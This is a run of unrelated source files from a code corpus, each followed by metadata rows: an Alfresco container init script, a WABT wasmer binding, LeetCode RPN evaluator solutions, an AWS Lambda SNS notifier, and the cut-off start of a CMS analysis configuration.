else:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtp.starttls.enable\s*=', '#mail.smtp.starttls.enable=')
elif protocol == "smtps":
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtps.auth\s*=.*', 'mail.smtps.auth=false')
if starttls_enable == "true":
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtps.starttls.enable\s*=.*', 'mail.smtps.starttls.enable=true')
else:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtps.starttls.enable\s*=', '#mail.smtps.starttls.enable=')
else:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.username\s*=', '#mail.username=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.password\s*=', '#mail.password=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtp.auth\s*=', '#mail.smtp.auth=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtps.auth\s*=', '#mail.smtps.auth=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtp.starttls.enable\s*=', '#mail.smtp.starttls.enable=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtps.starttls.enable\s*=', '#mail.smtps.starttls.enable=')
def set_cifs(self, enable, server_name, domain):
global ALFRESCO_PATH
if self.skipSetupGlobal == True:
return
if enable == "true":
if server_name is None or server_name == "":
raise KeyError("You must provide the server name")
if domain is None or domain == "":
raise KeyError("You must provide the domain")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.enabled\s*=.*', 'cifs.enabled=true')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.Server.Name\s*=.*', 'cifs.Server.Name=' + server_name)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.domain\s*=.*', 'cifs.domain=' + domain)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.hostannounce\s*=.*', 'cifs.hostannounce=true')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.broadcast\s*=.*', 'cifs.broadcast=0.0.0.255')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.ipv6.enabled\s*=.*', 'cifs.ipv6.enabled=false')
else:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.enabled\s*=', '#cifs.enabled=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.Server.Name\s*=', '#cifs.Server.Name=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.domain\s*=', '#cifs.domain=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.hostannounce\s*=', '#cifs.hostannounce=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.broadcast\s*=', '#cifs.broadcast=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.ipv6.enabled\s*=', '#cifs.ipv6.enabled=')
def set_ldap(self, enable, auth_format, host, user, password, list_admins, search_base_group, search_base_user):
global ALFRESCO_PATH
if self.skipSetupLdap == True:
return
if enable == "true":
if auth_format is None or auth_format == "":
raise KeyError("You must provide auth_format")
if host is None or host == "":
raise KeyError("You must provide host")
if user is None or user == "":
raise KeyError("You must provide user")
if password is None or password == "":
raise KeyError("You must provide password")
if list_admins is None or list_admins == "":
raise KeyError("You must provide list admins")
if search_base_group is None or search_base_group == "":
raise KeyError("You must provide the search base group")
if search_base_user is None or search_base_user == "":
raise KeyError("You must provide the search base user")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'authentication.chain\s*=.*', 'authentication.chain=alfrescoNtlm1:alfrescoNtlm,ldap1:ldap')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties', 'ldap.authentication.userNameFormat\s*=.*', 'ldap.authentication.userNameFormat=' + auth_format)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties', 'ldap.authentication.java.naming.provider.url\s*=.*', 'ldap.authentication.java.naming.provider.url=ldap://' + host + ':389')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties', 'ldap.authentication.defaultAdministratorUserNames\s*=.*', 'ldap.authentication.defaultAdministratorUserNames=' + list_admins)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties', 'ldap.synchronization.java.naming.security.principal\s*=.*', 'ldap.synchronization.java.naming.security.principal=' + user)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties', 'ldap.synchronization.java.naming.security.credentials\s*=.*', 'ldap.synchronization.java.naming.security.credentials=' + password)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties', 'ldap.synchronization.groupSearchBase\s*=.*', 'ldap.synchronization.groupSearchBase=' + search_base_group)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties', 'ldap.synchronization.userSearchBase\s*=.*', 'ldap.synchronization.userSearchBase=' + search_base_user)
else:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'authentication.chain\s*=.*', 'authentication.chain=alfrescoNtlm1:alfrescoNtlm')
def init_data_folder(self):
global ALFRESCO_PATH
if len(os.listdir(ALFRESCO_PATH + '/alf_data')) < 5:
os.system('mv ' + ALFRESCO_PATH + '/alf_data_org/* ' + ALFRESCO_PATH + '/alf_data/')
os.system('chown -R alfresco:alfresco ' + ALFRESCO_PATH + '/alf_data')
def set_reverse_proxy(self, url):
global ALFRESCO_PATH
if url is None or url == "":
raise KeyError("You must provide url")
csrf_policy = """
<config evaluator="string-compare" condition="CSRFPolicy" replace="true">
<!--
Will be used and exposed to the client side code in Alfresco.contants.CSRF_POLICY.
Use the Alfresco.util.CSRFPolicy.getHeader() or Alfresco.util.CSRFPolicy.getParameter() with Alfresco.util.CSRFPolicy.getToken()
to set the token in custom 3rd party code.
-->
<client>
<cookie>Alfresco-CSRFToken</cookie>
<header>Alfresco-CSRFToken</header>
<parameter>Alfresco-CSRFToken</parameter>
</client>
<!-- The first rule with a matching request will get its action invoked, the remaining rules will be ignored. -->
<filter>
<!--
Certain Surf POST requests form the WebScript console must be allowed to pass without a token since
the Surf WebScript console code can't be dependent on a Share specific filter.
-->
<rule>
<request>
<method>POST</method>
<path>^\/page\/caches\/dependency\/clear|^\/page\/index|^\/page\/surfBugStatus|^\/page\/modules\/deploy|^\/page\/modules\/module|^\/page\/api\/javascript\/debugger</path>
</request>
<action name="assertReferer">
<param name="always">false</param>
<param name="referer">""" + url + """/.*</param>
</action>
<action name="assertOrigin">
<param name="always">false</param>
<param name="origin">""" + url + """</param>
</action>
</rule>
<!-- Certain Share POST requests does NOT require a token -->
<rule>
<request>
<method>POST</method>
<path>^/page/dologin.*|^\/page/site\/[^\/]+\/start-workflow|^\/page/start-workflow</path>
</request>
<action name="assertReferer">
<param name="always">false</param>
<param name="referer">""" + url + """/.*</param>
</action>
<action name="assertOrigin">
<param name="always">false</param>
<param name="origin">""" + url + """</param>
</action>
</rule>
<!-- Clear the token when logging out -->
<rule>
<request>
<method>GET</method>
<path>^/page/dologout.*</path>
</request>
<action name="clearToken">
<param name="session">Alfresco-CSRFToken</param>
<param name="cookie">Alfresco-CSRFToken</param>
</action>
</rule>
<!-- Make sure the first token is generated -->
<rule>
<request>
<session>
<attribute name="_alf_USER_ID">.*</attribute>
<attribute name="Alfresco-CSRFToken"/>
<!-- empty attribute element indicates null -->
</session>
</request>
<action name="generateToken">
<param name="session">Alfresco-CSRFToken</param>
<param name="cookie">Alfresco-CSRFToken</param>
</action>
</rule>
<!-- Refresh token on new "page" visit when a user is logged in -->
<rule>
<request>
<method>GET</method>
<path>^/page/.*</path>
<session>
<attribute name="_alf_USER_ID">.*</attribute>
<attribute name="Alfresco-CSRFToken">.*</attribute>
</session>
</request>
<action name="generateToken">
<param name="session">Alfresco-CSRFToken</param>
<param name="cookie">Alfresco-CSRFToken</param>
</action>
</rule>
<!-- Verify multipart requests contains the token as a parameter and also correct referer & origin header if available -->
<rule>
<request>
<method>POST</method>
<header name="Content-Type">^multipart/.*</header>
<session>
<attribute name="_alf_USER_ID">.*</attribute>
</session>
</request>
<action name="assertToken">
<param name="session">Alfresco-CSRFToken</param>
<param name="parameter">Alfresco-CSRFToken</param>
</action>
<action name="assertReferer">
<param name="always">false</param>
<param name="referer">""" + url + """/.*</param>
</action>
<action name="assertOrigin">
<param name="always">false</param>
<param name="origin">""" + url + """</param>
</action>
</rule>
<!--
Verify there is a token in the header for remaining state changing requests and also correct
referer & origin headers if available. We "catch" all content types since just setting it to
"application/json.*" since a webscript that doesn't require a json request body otherwise would be
successfully executed using i.e. "text/plain".
-->
<rule>
<request>
<method>POST|PUT|DELETE</method>
<session>
<attribute name="_alf_USER_ID">.*</attribute>
</session>
</request>
<action name="assertToken">
<param name="session">Alfresco-CSRFToken</param>
<param name="header">Alfresco-CSRFToken</param>
</action>
<action name="assertReferer">
<param name="always">false</param>
<param name="referer">""" + url + """/.*</param>
</action>
<action name="assertOrigin">
<param name="always">false</param>
<param name="origin">""" + url + """</param>
</action>
</rule>
</filter>
</config>
"""
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/web-extension/share-config-custom.xml', '<\/alfresco-config>', csrf_policy + "\n</alfresco-config>")
def set_vti_setting(self, host, port):
if self.skipSetupGlobal == True:
return
if host is not None and host != "" and port is not None and port > 0:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.vti.server.port\s*=.*', 'vti.server.port=7070')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.vti.server.external.host\s*=.*', 'vti.server.external.host=' + host)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.vti.server.external.port\s*=.*', 'vti.server.external.port=' + port)
else:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.vti.server.port\s*=.*', '#vti.server.port=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.vti.server.external.host\s*=.*', '#vti.server.external.host=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.vti.server.external.port\s*=.*', '#vti.server.external.port=')
def disable_log_rotation(self):
valve_setting = 'prefix="localhost_access_log" suffix=".log" pattern="combined" rotatable="false"'
self.replace_all(ALFRESCO_PATH + '/tomcat/conf/server.xml', 'prefix="localhost_access_log" suffix=".txt"', valve_setting)
self.replace_all(ALFRESCO_PATH + '/tomcat/conf/server.xml', re.escape('pattern="%h %l %u %t "%r" %s %b"'), '')
logging_setting = """
1catalina.org.apache.juli.FileHandler.rotatable = false
2localhost.org.apache.juli.FileHandler.rotatable = false
3manager.org.apache.juli.FileHandler.rotatable = false
4host-manager.org.apache.juli.FileHandler.rotatable = false
1catalina.org.apache.juli.FileHandler.suffix = log
2localhost.org.apache.juli.FileHandler.suffix = log
3manager.org.apache.juli.FileHandler.suffix = log
4host-manager.org.apache.juli.FileHandler.suffix = log
"""
self.add_end_file(ALFRESCO_PATH + '/tomcat/conf/logging.properties', logging_setting)
def replace_all(self, file, searchRegex, replaceExp, is_create = True):
""" Replace String in file with regex
:param file: The file name where you should to modify the string
:param searchRegex: The pattern witch must match to replace the string
:param replaceExp: The string replacement
:return:
"""
is_found = False
regex = re.compile(searchRegex, re.IGNORECASE)
f = open(file,'r')
out = f.readlines()
f.close()
f = open(file,'w')
for line in out:
if regex.search(line) is not None:
line = regex.sub(replaceExp, line)
is_found = True
f.write(line)
f.close()
if is_create is True and is_found is False:
self.add_end_file(file, replaceExp)
def add_end_file(self, file, line):
""" Add line at the end of file
:param file: The file where you should to add line to the end
:param line: The line to add in file
:return:
"""
with open(file, "a") as myFile:
myFile.write("\n" + line + "\n")
if __name__ == '__main__':
if os.path.isfile(ALFRESCO_PATH + '/init_done'):
print('echo ==================== find init_done, skip!')
exit(0)
else:
os.system('touch ' + ALFRESCO_PATH + '/init_done')
serviceRun = ServiceRun()
# We init alfresco config
if os.path.isfile(ALFRESCO_GLOBAL_BAK):
serviceRun.skipSetupGlobal = True
print('echo ========== copy global bak')
os.system('cp ' + ALFRESCO_GLOBAL_BAK + ' ' + ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties')
else:
os.system('cp ' + ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties.org ' + ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties')
if os.path.isfile(ALFRESCO_LDAP_BAK):
serviceRun.skipSetupLdap = True
print('echo ========== copy ldap bak')
os.system('cp ' + ALFRESCO_LDAP_BAK + ' ' + ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties')
# We init share-config
os.system('cp ' + ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/web-extension/share-config-custom.xml.org ' + ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/web-extension/share-config-custom.xml')
# We init tomcat setting
os.system('cp ' + ALFRESCO_PATH + '/tomcat/conf/server.xml.org ' + ALFRESCO_PATH + '/tomcat/conf/server.xml')
os.system('cp ' + ALFRESCO_PATH + '/tomcat/conf/logging.properties.org ' + ALFRESCO_PATH + '/tomcat/conf/logging.properties')
# We init data folder
serviceRun.init_data_folder()
# We remove log rotation to manage them with logrotate
serviceRun.disable_log_rotation()
# We set database
# We check if official Postgresql container is linked as DB
if os.getenv('DB_ENV_POSTGRES_DB') is not None:
serviceRun.set_database_connection('postgresql', 'db', '5432', os.getenv('DB_ENV_POSTGRES_DB'), os.getenv('DB_ENV_POSTGRES_USER'), os.getenv('DB_ENV_POSTGRES_PASSWORD'))
elif os.getenv('DB_ENV_MYSQL_DATABASE') is not None:
serviceRun.set_database_connection('mysql', 'db', '3306', os.getenv('DB_ENV_MYSQL_DATABASE'), os.getenv('DB_ENV_MYSQL_USER'), os.getenv('DB_ENV_MYSQL_PASSWORD'))
else:
serviceRun.set_database_connection(os.getenv('DATABASE_TYPE', 'postgresql'), os.getenv('DATABASE_HOST', 'localhost'), os.getenv('DATABASE_PORT', '5432'), os.getenv('DATABASE_NAME', 'alfresco'), os.getenv('DATABASE_USER', 'alfresco'), os.getenv('DATABASE_PASSWORD', 'admin'))
# We set alfresco url
serviceRun.set_alfresco_context(os.getenv('ALFRESCO_HOSTNAME', '127.0.0.1'), os.getenv('ALFRESCO_PORT', '8080'), os.getenv('ALFRESCO_PROTOCOL', 'http'))
# We set share url
serviceRun.set_share_context(os.getenv('SHARE_HOSTNAME', '127.0.0.1'), os.getenv('SHARE_PORT', '8080'), os.getenv('SHARE_PROTOCOL', 'http'))
# We set ftp
serviceRun.set_ftp(os.getenv('FTP_ENABLED', 'true'), os.getenv('FTP_PORT', '21'))
# We set environment
serviceRun.set_core(os.getenv('ENVIRONMENT', 'PRODUCTION'))
# We set mail
serviceRun.set_mail(os.getenv('MAIL_HOST', 'localhost'), os.getenv('MAIL_PORT', '25'), os.getenv('MAIL_USER'), os.getenv('MAIL_PASSWORD'), os.getenv('MAIL_PROTOCOL', 'smtp'), os.getenv('MAIL_STARTTLS_ENABLE', 'false'), os.getenv('MAIL_SENDER', 'alfresco@alfresco.org'))
# We set CIFS
serviceRun.set_cifs(os.getenv('CIFS_ENABLED', 'true'), os.getenv('CIFS_SERVER_NAME', 'localhost'), os.getenv('CIFS_DOMAIN', 'WORKGROUP'))
# We set LDAP
serviceRun.set_ldap(os.getenv('LDAP_ENABLED', 'false'), os.getenv('LDAP_AUTH_FORMAT'), os.getenv('LDAP_HOST'), os.getenv('LDAP_USER'), os.getenv('LDAP_PASSWORD'), os.getenv('LDAP_ADMINS'), os.getenv('LDAP_GROUP_SEARCHBASE'), os.getenv('LDAP_USER_SEARCHBASE'))
# Reverse Proxy
if os.getenv('REVERSE_PROXY_URL') is not None:
serviceRun.set_reverse_proxy(os.getenv('REVERSE_PROXY_URL'))
# We set vti
serviceRun.set_vti_setting(os.getenv('VTI_HOST'), os.getenv('VTI_PORT'))
| 52.854578 | 287 | 0.646909 | 3,490 | 29,440 | 5.334384 | 0.109456 | 0.063168 | 0.076382 | 0.092818 | 0.666917 | 0.62921 | 0.569694 | 0.551002 | 0.539937 | 0.520277 | 0 | 0.003742 | 0.201189 | 29,440 | 556 | 288 | 52.94964 | 0.787898 | 0.024321 | 0 | 0.41866 | 0 | 0.033493 | 0.572949 | 0.314862 | 0 | 0 | 0 | 0 | 0.023923 | 1 | 0.033493 | false | 0.045455 | 0.014354 | 0 | 0.076555 | 0.007177 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e16e474f5899171e6ce2d20a4edacc0bd469b0 | 2,343 | py | Python | embeddings/py/input.py | wapm-modules/wabt | 100bbbe6ef3ab968007460dfb3821122a4d2e828 | [
"Apache-2.0"
] | 3 | 2019-04-24T04:19:52.000Z | 2022-01-11T12:06:54.000Z | embeddings/py/input.py | wapm-modules/wabt | 100bbbe6ef3ab968007460dfb3821122a4d2e828 | [
"Apache-2.0"
] | null | null | null | embeddings/py/input.py | wapm-modules/wabt | 100bbbe6ef3ab968007460dfb3821122a4d2e828 | [
"Apache-2.0"
] | 1 | 2022-02-17T01:09:19.000Z | 2022-02-17T01:09:19.000Z | from wasmer import Store, Module, Instance
from intrinsics import encode_utf8, decode_utf8
from enum import IntFlag
class WasmFeature(IntFlag):
Exceptions=1
MutableGlobals=2
SatFloatToInt=4
SignExtension=8
SIMD=16
Threads=32
MultiValue=64
TailCall=128
BulkMemory=256
ReferenceTypes=512
Annotations=1024
GC=2048
Phase5=1|2|4|8|16|BulkMemory|ReferenceTypes
Phase4=Phase5
Phase3=Phase4|MultiValue|TailCall|Annotations
class WABT:
def instantiate(self, module, imports):
self.instance = Instance(module, imports)
def wasm2wat(self, wasm, flags):
memory = self.instance.exports.memory
realloc = self.instance.exports.canonical_abi_realloc
free = self.instance.exports.canonical_abi_free
val0 = wasm
len0 = len(val0)
ptr0 = realloc(0, 0, 1, len0 * 1)
buffer = memory.int8_view()
buffer[ptr0:ptr0+len0*1] = val0
ret = self.instance.exports.wasm2wat(ptr0, len0, flags)
ret = int(ret / 4)
buf32 = memory.int32_view()
if buf32[ret] == 0:
ptr1 = buf32[ret + 2]
len1 = buf32[ret + 4]
list1 = decode_utf8(memory, ptr1, len1)
free(ptr1, len1, 1)
return list1
elif buf32[ret] == 1:
ptr2 = buf32[ret + 2]
len2 = buf32[ret + 4]
list2 = decode_utf8(memory, ptr2, len2)
free(ptr2, len2, 1)
raise Exception(list2)
def wat2wasm(self, wat, flags):
memory = self.instance.exports.memory
realloc = self.instance.exports.canonical_abi_realloc
free = self.instance.exports.canonical_abi_free
ptr0, len0 = encode_utf8(wat, realloc, memory)
ret = self.instance.exports.wat2wasm(ptr0, len0, flags)
ret = int(ret / 4)
buf32 = memory.int32_view()
if buf32[ret] == 0:
ptr1 = buf32[ret + 2]
len1 = buf32[ret + 4]
buf8 = memory.int8_view()
wasm = bytearray(buf8[ptr1:ptr1+len1])
free(ptr1, len1, 1)
return wasm
elif buf32[ret] == 1:
ptr2 = buf32[ret + 2]
len2 = buf32[ret + 4]
message = decode_utf8(memory, ptr2, len2)
free(ptr2, len2, 1)
raise Exception(message)
| 32.09589 | 63 | 0.589415 | 282 | 2,343 | 4.833333 | 0.294326 | 0.070433 | 0.111519 | 0.082172 | 0.46515 | 0.46515 | 0.46515 | 0.425532 | 0.425532 | 0.425532 | 0 | 0.093614 | 0.311566 | 2,343 | 72 | 64 | 32.541667 | 0.751395 | 0 | 0 | 0.38806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044776 | false | 0 | 0.074627 | 0 | 0.402985 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e1d763ca1d8682a94fdcd4b91fe4866361614f | 2,017 | py | Python | data_structure/stack_and_queue/150. Evaluate Reverse Polish Notation.py | JunzhongLin/leetcode_practice | 47b2f5cc3c87de004ae21a94024e751b40b8f559 | [
"MIT"
] | null | null | null | data_structure/stack_and_queue/150. Evaluate Reverse Polish Notation.py | JunzhongLin/leetcode_practice | 47b2f5cc3c87de004ae21a94024e751b40b8f559 | [
"MIT"
] | null | null | null | data_structure/stack_and_queue/150. Evaluate Reverse Polish Notation.py | JunzhongLin/leetcode_practice | 47b2f5cc3c87de004ae21a94024e751b40b8f559 | [
"MIT"
] | null | null | null | '''
Evaluate the value of an arithmetic expression in Reverse Polish Notation.
Valid operators are +, -, *, and /. Each operand may be an integer or another expression.
Note that division between two integers should truncate toward zero.
It is guaranteed that the given RPN expression is always valid. That means the expression would always evaluate to a result, and there will not be any division by zero operation.
Example 1:
Input: tokens = ["2","1","+","3","*"]
Output: 9
Explanation: ((2 + 1) * 3) = 9
Example 2:
Input: tokens = ["4","13","5","/","+"]
Output: 6
Explanation: (4 + (13 / 5)) = 6
Example 3:
Input: tokens = ["10","6","9","3","+","-11","*","/","*","17","+","5","+"]
Output: 22
Explanation: ((10 * (6 / ((9 + 3) * -11))) + 17) + 5
= ((10 * (6 / (12 * -11))) + 17) + 5
= ((10 * (6 / -132)) + 17) + 5
= ((10 * 0) + 17) + 5
= (0 + 17) + 5
= 17 + 5
= 22
'''
class Solution:
def evalRPN(self, tokens):
stack = []
for item in tokens:
if item not in {"+", "-", "*", "/"}:
stack.append(item)
else:
first_num, second_num = stack.pop(), stack.pop()
stack.append(
int(eval(f'{second_num} {item} {first_num}')) # 第一个出来的在运算符后面
)
return int(stack.pop()) # 如果一开始只有一个数,那么会是字符串形式的
class SolutionNew:
def evalRPN(self, tokens) -> int:
if tokens == []:
return None
operator_dict = {
'+': lambda x, y: x + y,
'-': lambda x, y: y - x,
'*': lambda x, y: x * y,
'/': lambda x, y: int(y/x)
}
stack = [int(tokens[0])]
for token in tokens[1:]:
if token in operator_dict:
value = operator_dict[token](stack.pop(), stack.pop())
stack.append(value)
else:
stack.append(int(token))
print(stack)
return stack.pop()
example = ["10","6","9","3","+","-11","*","/","*","17","+","5","+"] | 26.539474 | 178 | 0.499256 | 256 | 2,017 | 3.90625 | 0.390625 | 0.024 | 0.02 | 0.015 | 0.131 | 0.12 | 0.066 | 0.036 | 0 | 0 | 0 | 0.063754 | 0.307883 | 2,017 | 76 | 179 | 26.539474 | 0.652579 | 0.449678 | 0 | 0.0625 | 0 | 0 | 0.050863 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.21875 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e2b46fb8341d5afe3d208c2f568ad900e6e95e | 1,028 | py | Python | module-6/app/ProcessQuestionsStream/mysfitsProcessStream.py | dialectic4th/aws-modern-application-workshop | d99d8f57bb74535f3c7ee22777792197dedec9ef | [
"Apache-2.0"
] | 17 | 2019-11-05T05:30:16.000Z | 2021-11-25T01:20:16.000Z | module-6/app/ProcessQuestionsStream/mysfitsProcessStream.py | jtwray/serverlessAWS-react | c8062a4dd740559976b5c524b8c2cba742b7781a | [
"Apache-2.0"
] | 1 | 2021-05-06T20:05:14.000Z | 2021-05-06T20:05:14.000Z | module-6/app/ProcessQuestionsStream/mysfitsProcessStream.py | jtwray/serverlessAWS-react | c8062a4dd740559976b5c524b8c2cba742b7781a | [
"Apache-2.0"
] | 26 | 2019-07-10T16:29:40.000Z | 2020-09-13T19:35:42.000Z | import boto3
import json
import os
# UNCOMMENT_BEFORE_2ND_DEPLOYMENT
#from aws_xray_sdk.core import xray_recorder
# UNCOMMENT_BEFORE_2ND_DEPLOYMENT
#from aws_xray_sdk.core import patch_all
# UNCOMMENT_BEFORE_2ND_DEPLOYMENT
#patch_all()
snsTopic = os.environ['SNS_TOPIC_ARN']
sns = boto3.client('sns')
def processStream(event, context):
emailSubject = "New Customer Question: "
emailMessage = "USER EMAIL: "
print("Received event: " + json.dumps(event))
for record in event['Records']:
item = record.get('dynamodb').get('NewImage')
questionText = item.get('QuestionText').get('S')
userEmail = item.get('UserEmailAddress').get('S')
emailSubject = emailSubject + userEmail
emailMessage = emailMessage + userEmail + ". QUESTION TEXT: " + questionText
sns.publish(
TopicArn=snsTopic,
Message=emailMessage,
Subject=emailSubject
)
return 'Successfully processed {} records.'.format(len(event['Records']))
| 24.47619 | 84 | 0.679961 | 111 | 1,028 | 6.135135 | 0.522523 | 0.066079 | 0.079295 | 0.123348 | 0.152717 | 0.152717 | 0.152717 | 0.152717 | 0.152717 | 0.152717 | 0 | 0.006158 | 0.210117 | 1,028 | 41 | 85 | 25.073171 | 0.832512 | 0.182879 | 0 | 0 | 0 | 0 | 0.213685 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.142857 | 0 | 0.238095 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e3a79d5f9046cbb00a8f593c0ba35e44ea0538 | 11,890 | py | Python | MuonAnalysis/MomentumScaleCalibration/test/tree_production/miniAODVBTFMuonsOnlyTreeMC_CRAB_cfg.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 1 | 2020-05-27T10:52:33.000Z | 2020-05-27T10:52:33.000Z | MuonAnalysis/MomentumScaleCalibration/test/tree_production/miniAODVBTFMuonsOnlyTreeMC_CRAB_cfg.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 28 | 2019-08-15T15:21:11.000Z | 2021-12-29T14:13:18.000Z | MuonAnalysis/MomentumScaleCalibration/test/tree_production/miniAODVBTFMuonsOnlyTreeMC_CRAB_cfg.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 1 | 2020-08-18T10:29:49.000Z | 2020-08-18T10:29:49.000Z | import FWCore.ParameterSet.Config as cms
import FWCore.ParameterSet.VarParsing as VarParsing
process = cms.Process("TREE")
process.options = cms.untracked.PSet(wantSummary=cms.untracked.bool(True))
process.options = cms.untracked.PSet(SkipEvent = cms.untracked.vstring('ProductNotFound'))
### command-line options
options = VarParsing.VarParsing()
### eta ranges steerable
options.register('etaMax1',
2.4,
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.float,
"eta max (muon1)")
options.register('etaMin1',
-2.4,
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.float,
"eta min (muon1)")
options.register('etaMax2',
2.4,
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.float,
"eta max (muon2)")
options.register('etaMin2',
-2.4,
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.float,
"eta min (muon2)")
# next line is not working with CRAB
#options.parseArguments()
### end of options
# Messages
process.load("FWCore.MessageService.MessageLogger_cfi")
process.MessageLogger.destinations = ['cout', 'cerr']
process.MessageLogger.cerr.FwkReport.reportEvery = 500
from CondCore.DBCommon.CondDBSetup_cfi import *
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
############ DATABASE conditions ###########################
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc', '')
########### FILES ####################################
process.source = cms.Source(
"PoolSource",
# fileNames = cms.untracked.vstring('file:test.root')
fileNames = cms.untracked.vstring(
